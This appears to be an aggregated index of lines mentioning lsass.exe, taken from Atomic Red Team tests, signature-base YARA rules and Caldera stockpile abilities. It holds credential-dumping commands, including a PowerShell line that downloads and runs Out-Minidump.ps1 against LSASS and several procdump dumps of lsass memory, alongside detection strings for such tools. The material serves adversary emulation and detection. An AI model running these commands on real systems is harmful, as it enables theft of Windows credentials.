| atomic-red-team | T1003.001.md | ## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1’); get-process lsass | Out-Minidump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | #{procdump_exe} -accepteula -mm lsass.exe #{output_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | $LSASS = tasklist | findstr “lsass” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | $FIELDS = $LSASS -split “\s+” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | - Atomic Test #1 - Masquerading as Windows LSASS process | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | ## Atomic Test #1 - Masquerading as Windows LSASS process | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | %SystemRoot%\Temp\lsass.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.md | - Atomic Test #2 - Remote Process Injection in LSASS via mimikatz | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.md | ## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.md | Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.002.md | $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,”cmd.exe”) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</blockquote> |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.002.md | After a reboot, Notepad.exe will be executed as child process of lsass.exe. | MIT License. © 2018 Red Canary |
| signature-base | apt_eqgrp.yar | $s1 = “LSASS.EXE” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_hafnium.yar | $s1 = “lsass.exe C:\windows\temp\lsass” ascii wide fullword | CC BY-NC 4.0 |
| signature-base | apt_irontiger_trendmicro.yar | $str2 = “Fail To Search LSASS Data” nocase wide ascii | CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s7 = “Cannot get LSASS.EXE PID!” fullword ascii /* score: ‘14.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s5 = “Error: Cannot open LSASS.EXE!.” fullword ascii /* score: ‘12.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s7 = “LSASS HANDLE: %x” fullword ascii /* score: ‘5.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_passthehashtoolkit.yar | $s6 = “Cannot get LSASS.EXE PID!” fullword ascii /* score: ‘14.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_rwmc_powershell_creddump.yar | $s3 = “Copy-Item -Path "\\$computername\\c$\windows\temp\lsass.dmp" -Destination "$logDirectoryPath"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_skeletonkey.yar | $target_process = “lsass.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_sphinx_moth.yar | $s2 = “LSASS secure pipe” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | description = “Detects uncommon file size of lsass.exe” | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | and filename == “lsass.exe” | CC BY-NC 4.0 |
| signature-base | generic_dumps.yar | description = “Detects a LSASS memory dump file” | CC BY-NC 4.0 |
| signature-base | generic_dumps.yar | $s1 = “lsass.exe” ascii fullword | CC BY-NC 4.0 |
| signature-base | gen_fireeye_redteam_tools.yar | $lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 } | CC BY-NC 4.0 |
| signature-base | gen_powershell_suite.yar | $ = “Calling Advapi32::OpenProcessToken –> LSASS” ascii | CC BY-NC 4.0 |
| signature-base | gen_powershell_toolkit.yar | $x4 = “Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local” fullword ascii | CC BY-NC 4.0 |
| signature-base | spy_equation_fiveeyes.yar | $s1 = “lsasrv32.dll and lsass.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | spy_equation_fiveeyes.yar | $s3 = “LSASS.EXE” fullword wide | CC BY-NC 4.0 |
| signature-base | spy_regin_fiveeyes.yar | $s0 = “\SYSTEMROOT\system32\lsass.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $d = “Cannot get PID of LSASS.EXE” | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $f = “Couldn’t find LSASS pid” | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s0 = “LSASS.EXE” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s2 = “LSASS.EXE” fullword wide | CC BY-NC 4.0 |
| signature-base | thor-hacktools.yar | $s2 = “Unable to open LSASS.EXE process” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | description = “Anomaly rule looking for certain strings in a system file (maybe false positive on certain systems) - file lsass.exe” | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | filename == “lsass.exe” | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | description = “LSASS minidump file for mimikatz” | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | $lsass = “System32\lsass.exe” wide nocase | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | (uint32(0) == 0x504d444d) and $lsass and filesize > 50000KB and not filename matches /WER/ | CC BY-NC 4.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | name: Leverage Procdump for lsass memory |
Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | description: Dump lsass for later use with mimikatz |
Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | name: "OS Credential Dumping: LSASS Memory" |
Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; |
Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; |
Apache-2.0 |
| stockpile | 7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml | name: "OS Credential Dumping: LSASS Memory" |
Apache-2.0 |
| stockpile | baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml | name: "OS Credential Dumping: LSASS Memory" |
Apache-2.0 |
| stockpile | 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml | name: Find LSASS |
Apache-2.0 |
| stockpile | 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml | description: Get process info for LSASS |
Apache-2.0 |
| stockpile | 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml | $valid = foreach($p in $ps) { if($p.ProcessName -eq "lsass") {$p} }; |
Apache-2.0 |
| stockpile | 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml | Process[] allProc = Process.GetProcessesByName("lsass"); |
Apache-2.0 |
MIT License. Copyright (c) 2020-2021 Strontic.